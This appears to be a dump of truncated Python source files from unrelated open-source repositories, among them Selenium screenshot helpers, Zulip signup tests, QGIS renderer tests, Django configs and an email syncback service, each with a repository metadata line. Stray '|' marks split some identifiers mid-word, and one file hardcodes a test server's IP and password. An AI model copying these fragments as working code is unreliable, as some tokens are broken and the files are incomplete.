(dimensions['left'] + dimensions['width']),
(dimensions['top'] + dimensions['height'])
)
return ()
@staticmethod
def _get_ratio(image_size, window_size):
return max((
math.ceil(image_size[0] / float(window_size[0])),
math.ceil(image_size[1] / float(window_size[1]))
))
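# Editor's note: on high-DPI (e.g. Retina) displays the screenshot bitmap can
# be larger than the reported window size; this ratio rescales element
# coordinates into image pixels before cropping or masking.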
def _get_window_size(self):
window_size = self.driver.get_window_size()
return window_size['width'], window_size['height']
@property
def baseline_dir(self):
"""Return baseline image path
:return:
:rtype: str
"""
return self.options.get('baseline_dir', DEFAULT_BASELINE_DIR)
@baseline_dir.setter
def baseline_dir(self, value):
"""Set baseline image directory
:param str value: File path
:return:
"""
assert isinstance(value, basestring)
self.options['baseline_dir'] = value
@property
def cleanup_on_success(self):
"""Returns True, if cleanup on success flag is set
:return:
:rtype: bool
"""
return self.options.get('cleanup_on_success', False)
@cleanup_on_success.setter
def cleanup_on_success(self, value):
"""Set cleanup on success flag
:param bool value: Cleanup on success flag
:return:
"""
self.options['cleanup_on_success'] = bool(value)
@property
def engine(self):
"""Return image processing engine
:return:
"""
return import_from_string(self.engine_class)()
@property
def engine_class(self):
"""Return image processing engine name
:return:
:rtype: str
"""
return self.ENGINES.get(self.options.get('needle_engine', 'pil').lower(), DEFAULT_ENGINE)
@engine_class.setter
def engine_class(self, value):
"""S
|
et image processing engine name
:param str value: Image processing engine name (pil, imagemagick, perceptualdiff)
:return:
"""
assert value.lower() in self.ENGINES
self.options['needle_engine'] = value.lower()
def get_screenshot(self, element=None):
"""Returns screenshot image
:param WebElement element: Crop image to element (Optional)
:return:
"""
stream = IOClass(base64.b64decode(self.driver.get_screenshot_as_base64().encode('ascii')))
image = Image.open(stream).convert('RGB')
if isinstance(element, WebElement):
window_size = self._get_window_size()
image_size = image.size
# Get dimensions of element
dimensions = self._get_element_dimensions(element)
if not image_size == (dimensions['width'], dimensions['height']):
ratio = self._get_ratio(image_size, window_size)
return image.crop([point * ratio for point in self._get_element_rect(element)])
return image
def get_screenshot_as_image(self, element=None, exclude=None):
"""
:param WebElement element: Crop image to element (Optional)
:param list exclude: Elements to exclude
:return:
"""
image = self.get_screenshot(element)
# Mask elements in exclude if element is not included
if isinstance(exclude, (list, tuple)) and exclude and not element:
# Gather all elements to exclude
elements = [self._find_element(element) for element in exclude]
elements = [element for element in elements if element]
canvas = ImageDraw.Draw(image)
window_size = self._get_window_size()
image_size = image.size
ratio = self._get_ratio(image_size, window_size)
for ele in elements:
canvas.rectangle([point * ratio for point in self._get_element_rect(ele)],
fill=ImageColor.getrgb('black'))
del canvas
return image
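# Editor's sketch (hypothetical selectors): masking dynamic page regions
# before an image comparison -- matched elements are painted black.
#
#   image = needle_driver.get_screenshot_as_image(
#       exclude=[('id', 'clock'), ('css selector', '.ad-banner')])
#   image.save('masked.png')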
def assert_screenshot(self, file_path, element_or_selector=None, threshold=0, exclude=None):
"""Fail if new fresh image is too dissimilar from the baseline image
.. note:: From needle
https://github.com/python-needle/needle/blob/master/needle/cases.py#L161
:param str file_path: File name for baseline image
:param element_or_selector: WebElement or tuple containing selector ex. ('id', 'mainPage')
:
codevan/codevan | BitcoinPlay/multisig_address.py | Python | apache-2.0 | 911 | 0.004391 |
#!/usr/bin/env/ python
'''
Title - Create multi-signature address
'''
# Import bitcoin
from bitcoin import *
my_private_key1 = random_key()
my_private_key2 = random_key()
my_private_key3 = random_key()
print("Private Key1: %s\n" % my_private_key1)
print("Private Key2: %s\n" % my_private_key2)
print("Private Key3: %s\n" % my_private_key3)
print('\n');
# Generate Public Key:
my_public_key1 = privtopub(my_private_key1)
my_public_key2 = privtopub(my_private_key2)
my_public_key3 = privtopub(my_private_key3)
print("Public Key1: %s\n" % my_public_key1)
print("Public Key2: %s\n" % my_public_key2)
print("Public Key3: %s\n" % my_public_key3)
print('\n');
# Create Multi-Sig Address:
my_multi_sig = mk_multisig_script(my_public_key1, my_public_key2, my_public_key3, 2, 3)
my_multisig_address = scriptaddr(my_multi_sig)
print("Multi Signature Address %s\n" % my_multisig_address)
ThermoNuclearPanda/Project_Automail | Python Files/utilities.py | Python | mit | 358 | 0.022346 |
"""
@Author: Kiran Gurajala & Alex Lee
@Project: Project Automail
@Version: 1.0
"""
# Required imports
import struct
# Utils
def pack(fmt, *args):
return struct.pack('<' + fmt, *args)
def unpack(fmt, *args):
return struct.unpack('<' + fmt, *args)
def multichr(values):
return ''.join(map(chr, values))
def multiord(values):
return map(ord, values)
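# Editor's sketch (hypothetical values, not in the original): a little-endian
# round trip through the helpers above.
if __name__ == '__main__':
    data = pack('HH', 1027, 3)          # struct format '<HH'
    assert unpack('HH', data) == (1027, 3)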
whardier/jabberhooky | jabberhooky/__init__.py | Python | mit | 263 | 0.003802 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
|
JabberHooky"""
__name__ = "j
|
abberhooky"
__author__ = 'Shane R. Spencer'
__email__ = "shane@bogomip.com"
__license__ = 'MIT'
__copyright__ = '2012 Shane R. Spencer'
__version__ = '0.0.1'
__status__ = "Prototype"
kxgames/vecrec | docs/conf.py | Python | mit | 857 | 0.007001 |
import sys, os
import vecrec
## General
project = u'vecrec'
copyright = u'2015, Kale Kundert'
version = vecrec.__version__
release = vecrec.__version__
master_doc = 'index'
source_suffix = '.rst'
templates_path = ['templates']
exclude_patterns = ['build']
default_role = 'any'
pygments_style = 'sphinx'
## Extensions
extensions = [
'autoclasstoc',
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx',
'sphinx_rtd_theme',
]
intersphinx_mapping = { #
'pyglet': ('http://pyglet.readthedocs.io/en/latest', None),
'pygame': ('https://www.pygame.org/docs', None),
}
autosummary_generate = True
autodoc_default_options = {
'exclude-members': '__dict__,__weakref__,__module__',
}
html_theme = "sphinx_rtd_theme"
#html_static_path = ['static']
punchagan/zulip | zerver/tests/test_signup.py | Python | apache-2.0 | 225,136 | 0.002394 |
import datetime
import re
import time
import urllib
from typing import Any, Dict, List, Optional, Sequence
from unittest.mock import MagicMock, patch
from urllib.parse import urlencode
import orjson
from django.conf import settings
from django.contrib.auth.views import PasswordResetConfirmView
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.http import HttpResponse
from django.test import Client, override_settings
from django.urls import reverse
from django.utils.timezone import now as timezone_now
from confirmation import settings as confirmation_settings
from confirmation.models import (
Confirmation,
ConfirmationKeyException,
MultiuseInvite,
confirmation_url,
create_confirmation_link,
generate_key,
get_object_from_key,
one_click_unsubscribe_link,
)
from corporate.lib.stripe import get_latest_seat_count
from zerver.context_processors import common_context
from zerver.decorator import do_two_factor_login
from zerver.forms import HomepageForm, check_subdomain_available
from zerver.lib.actions import (
add_new_user_history,
change_user_is_active,
do_add_default_stream,
do_change_full_name,
do_change_realm_subdomain,
do_change_user_role,
do_create_default_stream_group,
do_create_realm,
do_create_user,
do_deactivate_realm,
do_deactivate_user,
do_get_user_invites,
do_invite_users,
do_set_realm_property,
get_default_streams_for_realm,
get_stream,
)
from zerver.lib.email_notifications import enqueue_welcome_emails, followup_day2_email_delay
from zerver.lib.initial_password import initial_password
from zerver.lib.mobile_auth_otp import (
ascii_to_hex,
hex_to_ascii,
is_valid_otp,
otp_decrypt_api_key,
otp_encrypt_api_key,
xor_hex_strings,
)
from zerver.lib.name_restrictions import is_disposable_domain
from zerver.lib.rate_limiter import add_ratelimit_rule, remove_ratelimit_rule
from zerver.lib.send_email import (
EmailNotDeliveredException,
FromAddress,
deliver_scheduled_emails,
send_future_email,
)
from zerver.lib.stream_subscription import get_stream_subscriptions_for_user
from zerver.lib.streams import create_stream_if_needed
from zerver.lib.subdomains import is_root_domain_available
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.test_helpers import (
avatar_disk_path,
cache_tries_captured,
find_key_by_email,
get_test_image_file,
load_subdomain_token,
message_stream_count,
most_recent_message,
most_recent_usermessage,
queries_captured,
reset_emails_in_zulip_realm,
)
from zerver.models import (
CustomProfileField,
CustomProfileFieldValue,
DefaultStream,
Message,
PreregistrationUser,
Realm,
RealmAuditLog,
Recipient,
ScheduledEmail,
Stream,
Subscription,
UserMessage,
UserProfile,
flush_per_request_caches,
get_realm,
get_system_bot,
get_user,
get_user_by_delivery_email,
)
from zerver.views.auth import redirect_and_log_into_subdomain, start_two_factor_auth
from zerver.views.development.registration import confirmation_key
from zerver.views.invite import get_invitee_emails_set
from zproject.backends import ExternalAuthDataDict, ExternalAuthResult
class RedirectAndLogIntoSubdomainTestCase(ZulipTestCase):
def test_data(self) -> None:
realm = get_realm("zulip")
user_profile = self.example_user("hamlet")
name = user_profile.full_name
email = user_profile.delivery_email
response = redirect_and_log_into_subdomain(ExternalAuthResult(user_profile=user_profile))
data = load_subdomain_token(response)
self.assertDictEqual(
data,
{"full_name": name, "email": email, "subdomain": realm.subdomain, "is_signup": False},
)
data_dict = ExternalAuthDataDict(is_signup=True, multiuse_object_key="key")
response = redirect_and_log_into_subdomain(
ExternalAuthResult(user_profile=user_profile, data_dict=data_dict)
)
data = load_subdomain_token(response)
self.assertDictEqual(
data,
{
"full_name": name,
"email": email,
"subdomain": realm.subdomain,
# the email has an account at the subdomain,
# so is_signup gets overridden to False:
"is_signup": False,
"multiuse_object_key": "key",
},
)
data_dict = ExternalAuthDataDict(
email=self.nonreg_email("alice"),
full_name="Alice",
subdomain=realm.subdomain,
is_signup=True,
full_name_validated=True,
multiuse_object_key="key",
)
response = redirect_and_log_into_subdomain(ExternalAuthResult(data_dict=data_dict))
data = load_subdomain_token(response)
self.assertDictEqual(
data,
{
"full_name": "Alice",
"email": self.nonreg_email("alice"),
"full_name_validated": True,
"subdomain": realm.subdomain,
"is_signup": True,
"multiuse_object_key": "key",
},
)
class DeactivationNoticeTestCase(ZulipTestCase):
def test_redirection_for_deactivated_realm(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
for url in ("/register/", "/login/"):
result = self.client_get(url)
self.assertEqual(result.status_code, 302)
self.assertIn("deactivated", result.url)
def test_redirection_for_active_realm(self) -> None:
for url in ("/register/", "/login/"):
result = self.client_get(url)
self.assertEqual(result.status_code, 200)
def test_deactivation_notice_when_realm_is_active(self) -> None:
result = self.client_get("/accounts/deactivated/")
self.assertEqual(result.status_code, 302)
self.assertIn("login", result.url)
def test_deactivation_notice_when_deactivated(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.client_get("/accounts/deactivated/")
self.assertIn("Zulip Dev, has been deactivated.", result.content.decode())
self.assertNotIn("It has moved to", result.content.decode())
def test_deactivation_notice_when_deactivated_and_deactivated_redirect_is_set(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.deactivated_redirect = "http://example.zulipchat.com"
realm.save(update_fields=["deactivated", "deactivated_redirect"])
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://example.zulipchat.com">http://example.zulipchat.com</a>.',
result.content.decode(),
)
def test_deactivation_notice_when_realm_subdomain_is_changed(self) -> None:
realm = get_realm("zulip")
do_change_realm_subdomain(realm, "new-subdomain-name", acting_user=None)
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://new-subdomain-name.testserver">http://new-subdomain-name.testserver</a>.',
result.content.decode(),
)
def test_deactivated_redirect_field_of_placeholder_realms_are_modified_on_changing_subdomain_multiple_times(
self,
) -> None:
realm = get_realm("zulip")
do_change_realm_subdomain(realm, "new-name-1", acting_user=None)
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://new-name-1.testserver">http://new-name-1.testserver</a>.',
result.content.decode(),
)
realm = get_realm("new-name-1")
do_change_realm_subdomain(realm, "new-name-2", acting_user=None)
result = sel
serefimov/billboards | billboards/billboards/wsgi.py | Python | mit | 1,568 | 0.001276 |
"""
WSGI config for billboards project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from os.path import abspath, dirname
from sys import path
SITE_ROOT = dirname(dirname(abspath(__file__)))
path.append(SITE_ROOT)
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "jajaja.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "billboards.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
ChantyTaguan/zds-site | zds/gallery/managers.py | Python | gpl-3.0 | 1,665 | 0.003003 |
from django.db import models
from django.db.models import OuterRef, Subquery, Count
from django.db.models.functions import Coalesce
class GalleryManager(models.Manager):
def annotated_gallery(self):
"""Annotate gallery with
- ``linked_content``, which contains the pk of the associated content if any ;
- ``image_count``, which contains the number of images.
:rtype: QuerySet
"""
from zds.tutorialv2.models.database import PublishableContent
from zds.gallery.models import Image
linked_content = PublishableContent.objects.filter(gallery__pk=OuterRef("pk")).values("pk")
images = (
Image.objects.filter(gallery__pk=OuterRef("pk"))
.values("gallery")
.annotate(count=Count("pk"))
.values("count")
)
return self.annotate(linked_content=Subquery(linked_content)).annotate(
image_count=Coalesce(Subquery(images), 0)
)
def galleries_of_user(self, user):
"""Get galleries of user, and annotate with an extra field ``user_mode`` (which contains R or W)
:param user: the user
:type user: zds.member.models.User
:rtype: QuerySet
"""
from zds.gallery.models import UserGallery
user_galleries = UserGallery.objects.filter(user=user).prefetch_related("gallery").values("gallery__pk")
user_mode = UserGallery.objects.filter(user=user, gallery__pk=OuterRef("pk"))
return (
self.annotated_gallery()
.filter(pk__in=user_galleries)
.annotate(user_mode=Subquery(user_mode.values("mode")))
)
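# Editor's sketch (assumes a Gallery model that sets ``objects = GalleryManager()``):
#
#   galleries = Gallery.objects.galleries_of_user(user)
#   for g in galleries:
#       print(g.pk, g.image_count, g.user_mode)  # e.g. 3 12 'W'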
rduivenvoorde/QGIS | tests/src/python/test_qgsrulebasedrenderer.py | Python | gpl-2.0 | 23,130 | 0.002335 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
test_qgsrulebasedrenderer.py
---------------------
Date : September 2015
Copyright : (C) 2015 by Matthias Kuhn
Email : matthias at opengis dot ch
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
From build dir, run: ctest -R PyQgsRulebasedRenderer -V
"""
__author__ = 'Matthias Kuhn'
__date__ = 'September 2015'
__copyright__ = '(C) 2015, Matthias Kuhn'
import qgis # NOQA
import os
from qgis.PyQt.QtCore import Qt, QSize
from qgis.PyQt.QtGui import QColor
from qgis.core import (QgsVectorLayer,
QgsMapSettings,
QgsProject,
QgsRectangle,
QgsMultiRenderChecker,
QgsRuleBasedRenderer,
QgsFillSymbol,
QgsMarkerSymbol,
QgsRendererCategory,
QgsCategorizedSymbolRenderer,
QgsGraduatedSymbolRenderer,
QgsRendererRange,
QgsRenderContext,
QgsSymbolLayer,
QgsSimpleMarkerSymbolLayer,
QgsProperty,
QgsFeature,
QgsGeometry,
QgsEmbeddedSymbolRenderer
)
from qgis.testing import start_app, unittest
from utilities import unitTestDataPath
# Convenience instances in case you may need them
# not used in this test
start_app()
TEST_DATA_DIR = unitTestDataPath()
class TestQgsRulebasedRenderer(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Super ugly hack to make sure python does not clean up our mapsetting objects
# this might lead to occasional crashes on travis
cls.mapsettings_archive = list()
def setUp(self):
myShpFile = os.path.join(TEST_DATA_DIR, 'rectangles.shp')
layer = QgsVectorLayer(myShpFile, 'Rectangles', 'ogr')
QgsProject.instance().addMapLayer(layer)
# Create rulebased style
sym1 = QgsFillSymbol.createSimple({'color': '#fdbf6f', 'outline_color': 'black'})
sym2 = QgsFillSymbol.createSimple({'color': '#71bd6c', 'outline_color': 'black'})
sym3 = QgsFillSymbol.createSimple({'color': '#1f78b4', 'outline_color': 'black'})
self.r1 = QgsRuleBasedRenderer.Rule(sym1, 0, 0, '"id" = 1')
self.r2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"id" = 2')
self.r3 = QgsRuleBasedRenderer.Rule(sym3, 0, 0, 'ELSE')
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(self.r1)
rootrule.appendChild(self.r2)
rootrule.appendChild(self.r3)
layer.setRenderer(QgsRuleBasedRenderer(rootrule))
self.mapsettings = QgsMapSettings()
self.mapsettings.setOutputSize(QSize(400, 400))
self.mapsettings.setOutputDpi(96)
self.mapsettings.setExtent(QgsRectangle(-163, 22, -70, 52))
rendered_layers = [layer]
self.mapsettings.setLayers(rendered_layers)
self.mapsettings_archive.append(self.mapsettings)
def testElse(self):
# Setup rendering check
renderchecker = QgsMultiRenderChecker()
renderchecker.setMapSettings(self.mapsettings)
renderchecker.setControlName('expected_rulebased_else')
self.assertTrue(renderchecker.runTest('rulebased_else'))
def testDisabledElse(self):
# Disable a rule and assert that it's hidden, not rendered with the ELSE rule
self.r2.setActive(False)
renderchecker = QgsMultiRenderChecker()
renderchecker.setMapSettings(self.mapsettings)
renderchecker.setControlName('expected_rulebased_disabled_else')
self.assertTrue(renderchecker.runTest('rulebased_disabled_else'))
def testWillRenderFeature(self):
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(0) # 'id' = 1
renderer = vl.renderer()
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
renderer.rootRule().children()[0].setActive(False)
renderer.rootRule().children()[1].setActive(True)
renderer.rootRule().children()[2].setActive(True)
renderer.startRender(ctx, vl.fields()) # build mActiveChildren
rendered = renderer.willRenderFeature(ft, ctx)
renderer.stopRender(ctx)
renderer.rootRule().children()[0].setActive(True)
self.assertFalse(rendered)
renderer.startRender(ctx, vl.fields()) # build mActiveChildren
rendered = renderer.willRenderFeature(ft, ctx)
renderer.stopRender(ctx)
self.assertTrue(rendered)
def testWillRenderFeatureNestedElse(self):
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(0) # 'id' = 1
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
# Create rulebased style
sym1 = QgsFillSymbol.createSimple({'color': '#fdbf6f', 'outline_color': 'black'})
sym2 = QgsFillSymbol.createSimple({'color': '#71bd6c', 'outline_color': 'black'})
sym3 = QgsFillSymbol.createSimple({'color': '#1f78b4', 'outline_color': 'black'})
self.rx1 = QgsRuleBasedRenderer.Rule(sym1, 0, 0, '"id" = 1')
self.rx2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"id" = 2')
self.rx3 = QgsRuleBasedRenderer.Rule(sym3, 0, 0, 'ELSE')
self.rx3.appendChild(self.rx1)
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(self.rx2)
rootrule.appendChild(self.rx3)
vl.setRenderer(QgsRuleBasedRenderer(rootrule))
renderer = vl.renderer()
# Render with else rule and all activated
renderer.startRender(ctx, vl.fields())
self.assertTrue(renderer.willRenderFeature(ft, ctx))
renderer.stopRender(ctx)
# Render with else rule where else is deactivated
renderer.rootRule().children()[1].setActive(False)
renderer.startRender(ctx, vl.fields())
self.assertFalse(renderer.willRenderFeature(ft, ctx))
renderer.stopRender(ctx)
def testFeatureCount(self):
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(2) # 'id' = 3 => ELSE
renderer = vl.renderer()
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
counter = vl.countSymbolFeatures()
counter.waitForFinished()
renderer.startRender(ctx, vl.fields())
elseRule = None
for rule in renderer.rootRule().children():
if rule.filterExpression() == 'ELSE':
elseRule = rule
self.assertIsNotNone(elseRule)
cnt = counter.featureCount(elseRule.ruleKey())
self.assertEqual(cnt, 1)
def testRefineWithCategories(self):
# Test refining rule with categories (refs #10815)
# First, try with a field based category (id)
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "id 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), ''))
cats.append(QgsRendererCategory(None, QgsMarkerSymbol(), ''))
c = QgsCategorizedSymbolRenderer("id", cats)
QgsRuleBasedRenderer.refineRuleCategories(self.r2, c)
self.assertEqual(self.r2.children()[0].filterExpression(), '"id" = 1')
self.assertEqual(self.r2.children()[1].filterExpression(), '"id" = 2')
self.ass
klpdotorg/dubdubdub | apps/users/migrations/0020_auto_20140925_1129.py | Python | mit | 905 | 0.00221 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0019_auto_20140909_1253'),
]
operations = [
migrations.AlterModelOptions(
name='donationitemcategory',
options={'verbose_name_plural': 'Donation item categories'},
),
migrations.AddField(
model_name='volunteeractivitytype',
name='color',
field=models.CharField(default='red', max_length=64, choices=[(b'red', b'Red'), (b'green', b'Green'), (b'purple', b'Purple')]),
preserve_default=False,
),
migrations.AlterField(
model_name='donationitem',
name='requirement',
field=models.ForeignKey(related_name=b'items', to='users.DonationRequirement'),
),
]
huggingface/pytorch-transformers | utils/get_modified_files.py | Python | apache-2.0 | 1,484 | 0.003369 |
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# this script reports modified .py files under the desired list of top-level sub-dirs passed as a list of arguments, e.g.:
# python ./utils/get_modified_files.py utils src tests examples
#
# it uses git to find the forking point and which files were modified - i.e. files not under git won't be considered
# since the output of this script is fed into Makefile commands it doesn't print a newline after the results
import re
import subprocess
import sys
fork_point_sha = subprocess.check_output("git merge-base master HEAD".split()).decode("utf-8")
modified_files = subprocess.check_output(f"git diff --name-only {fork_point_sha}".split()).decode("utf-8").split()
joined_dirs = "|".join(sys.argv[1:])
regex = re.compile(fr"^({joined_dirs}).*?\.py$")
relevant_modified_files = [x for x in modified_files if regex.match(x)]
print(" ".join(relevant_modified_files), end="")
|
JensTimmerman/radical.pilot
|
docs/architecture/api_draft/attributes.py
|
Python
|
mit
| 430
| 0.011628
|
# ------------------------------------------------------------------------------
#
class Attributes (object) :
# FIXME: add method sigs
# ------------------------------------------------------------------------------
#
def __init__ (self, vals={}) :
raise Exception ("%s is not implemented" % self.__class__.__name__)
# ------------------------------------------------------------------------------
#
|
hroumani/genericStorletStore
|
storletDeploy/sys_test_params.py
|
Python
|
apache-2.0
| 1,153
| 0
|
'''-------------------------------------------------------------------------
Copyright IBM Corp. 2015, 2015 All Rights Reserved
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
Limitations under the License.
-------------------------------------------------------------------------'''
'''
IMPORTANT: Make sure the variables AUTH_IP and KEYSTONE_IP point to the system
you are testing!!!
'''
'''------------------------------------------------------------------------'''
# Establishing Swift connection, user ID, etc
PROXY_PROTOCOL = 'HTTP'
AUTH_PROTOCOL = 'HTTP'
DEV_AUTH_IP = '9.26.19.179'
AUTH_IP = DEV_AUTH_IP
PROXY_PORT = '80'
AUTH_PORT = '5000'
ACCOUNT = 'service'
USER_NAME = 'swift'
PASSWORD = 'passw0rd'
|
morelab/labman_ud
|
labman_ud/labman_setup/migrations/0004_labmandeploygeneralsettings_background_color.py
|
Python
|
gpl-3.0
| 494
| 0
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('labman_setup', '0003_googlesearchscript'),
]
operations = [
migrations.AddField(
model_name='labmandeploygeneralsettings',
name='background_color',
field=models.CharField(max_length=25, null=True, blank=True),
preserve_default=True,
),
]
|
fogbow/fogbow-dashboard
|
horizon/templatetags/horizon.py
|
Python
|
apache-2.0
| 4,349
| 0.00046
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from django import template
from django.utils.datastructures import SortedDict # noqa
from django.utils.encoding import force_unicode # noqa
from django.utils.translation import ugettext_lazy as _ # noqa
from horizon.base import Horizon # noqa
from horizon import conf
register = template.Library()
@register.filter
def has_permissions(user, component):
"""
Checks if the given user meets the permissions requirements for
the component.
"""
return user.has_perms(getattr(component, 'permissions', set()))
@register.filter
def has_permissions_on_list(components, user):
return [component for component
in components if has_permissions(user, component)]
@register.inclusion_tag('horizon/_nav_list.html', takes_context=True)
def horizon_main_nav(context):
""" Generates top-level dashboard navigation entries. """
if 'request' not in context:
return {}
current_dashboard = context['request'].horizon.get('dashboard', None)
dashboards = []
for dash in Horizon.get_dashboards():
if callable(dash.nav) and dash.nav(context):
dashboards.append(dash)
elif dash.nav:
dashboards.append(dash)
return {'components': dashboards,
'user': context['request'].user,
'current': current_dashboard,
'request': context['request'],
'showOnlyComponent' : _("Federation")}
@register.inclusion_tag('horizon/_subnav_list.html', takes_context=True)
def horizon_dashboard_nav(context):
""" Generates sub-navigation entries for the current dashboard. """
if 'request' not in context:
return {}
dashboard = context['request'].horizon['dashboard']
panel_groups = dashboard.get_panel_groups()
non_empty_groups = []
for group in panel_groups.values():
allowed_panels = []
for panel in group:
if callable(panel.nav) and panel.nav(context):
allowed_panels.append(panel)
elif not callable(panel.nav) and panel.nav:
allowed_panels.append(panel)
if allowed_panels:
non_empty_groups.append((group.name, allowed_panels))
return {'components': SortedDict(non_empty_groups),
'user': context['request'].user,
'current': context['request'].horizon['panel'].slug,
'request': context['request']}
@register.filter
def quota(val, units=None):
if val == float("inf"):
return _("No Limit")
elif units is not None:
return "%s %s %s" % (val, units, force_unicode(_("Available")))
else:
return "%s %s" % (val, force_unicode(_("Available")))
class JSTemplateNode(template.Node):
""" Helper node for the ``jstemplate`` template tag. """
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
output = self.nodelist.render(context)
output = output.replace('[[[', '{{{').replace(']]]', '}}}')
output = output.replace('[[', '{{').replace(']]', '}}')
output = output.replace('[%', '{%').replace('%]', '%}')
return output
@register.tag
def jstemplate(parser, token):
"""
Replaces ``[[[`` and ``]]]`` with ``{{{`` and ``}}}``,
``[[`` and ``]]`` with ``{{`` and ``}}`` and
``[%`` and ``%]`` with ``{%`` and ``%}`` to avoid conflicts
with Django's template engine when using any of the Mustache-based
templating libraries.
"""
nodelist = parser.parse(('endjstemplate',))
parser.delete_first_token()
return JSTemplateNode(nodelist)
@register.assignment_tag
def load_config():
return conf.HORIZON_CONFIG
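# Standalone sketch of the bracket rewriting JSTemplateNode.render() performs,
# shown on a literal string (the template content below is made up):
_demo = "[[[ raw ]]] [[ name ]] [% if ok %]yes[% endif %]"
_demo = _demo.replace('[[[', '{{{').replace(']]]', '}}}')
_demo = _demo.replace('[[', '{{').replace(']]', '}}')
_demo = _demo.replace('[%', '{%').replace('%]', '%}')
assert _demo == "{{{ raw }}} {{ name }} {% if ok %}yes{% endif %}"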
|
rmasters/inbox
|
inbox/transactions/actions.py
|
Python
|
agpl-3.0
| 3,454
| 0
|
"""Monitor the transaction log for changes that should be synced back to the
account backend.
TODO(emfree):
* Track syncback failure/success state, and implement retries
(syncback actions may be lost if the service restarts while actions are
still pending).
* Add better logging.
"""
import gevent
from sqlalchemy import asc, func
from inbox.util.concurrency import retry_with_logging
from inbox.log import get_logger
from inbox.models.session import session_scope
from inbox.models import ActionLog, Namespace
from inbox.actions import (mark_read, mark_unread, archive, unarchive, star,
unstar, save_draft, delete_draft, mark_spam,
unmark_spam, mark_trash, unmark_trash, send_draft)
ACTION_FUNCTION_MAP = {
'archive': archive,
'unarchive': unarchive,
'mark_read': mark_read,
'mark_unread': mark_unread,
'star': star,
'unstar': unstar,
'mark_spam': mark_spam,
'unmark_spam': unmark_spam,
'mark_trash': mark_trash,
'unmark_trash': unmark_trash,
'send_draft': send_draft,
'save_draft': save_draft,
'delete_draft': delete_draft
}
class SyncbackService(gevent.Greenlet):
"""Asynchronously consumes the action log and exe
|
cutes syncback actions."""
def __init__(self, poll_interval=1, chunk_size=22, max_pool_size=22):
self.log = get_logger()
self.worker_pool = gevent.pool.Pool(max_pool_size)
self.poll_interval = poll_interval
self.chunk_size = chunk_size
with session_scope() as db_session:
# Just start working from the head of the log.
